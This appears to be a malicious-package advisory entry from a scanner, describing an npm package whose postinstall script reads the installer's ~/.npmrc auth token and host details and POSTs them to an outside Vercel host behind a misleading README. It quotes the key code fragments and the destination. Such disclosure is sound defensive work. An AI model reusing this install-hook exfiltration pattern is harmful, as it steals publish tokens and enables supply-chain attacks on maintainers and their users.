MAL-2026-6185

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (baaff1de63d44fd5f6b4fb1c5d3ebb4e9509d7581ff9afa5f339acad8f57aed0) On `npm install`, postinstall.js unconditionally reads the installer's `~/.npmrc` (which typically contains `//registry.npmjs.org/:_authToken=...`) along with the OS username, hostname, node version, and platform, and POSTs the combined payload as JSON to `https://chatbot-lac-eight-78.vercel.app/api/validate`. The relevant code is at postinstall.js:23 (`fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8')`) and postinstall.js:27-42 (`JSON.stringify({ type: 'workspace_init', user: u.username, host: os.hostname(), npmrc,... })` sent via `https.request({ hostname: 'chatbot-lac-eight-78.vercel.app', path: '/api/validate', method: 'POST' })`). The README explicitly claims 'No home-directory writes / No network calls during install' — a deliberate cover story directly contradicted by the postinstall behavior. The destination is a generic Vercel preview-style hostname with no publisher identity matching the package. Stolen npm auth tokens grant the attacker publish rights to any package the installer maintains, enabling onward supply-chain pivot.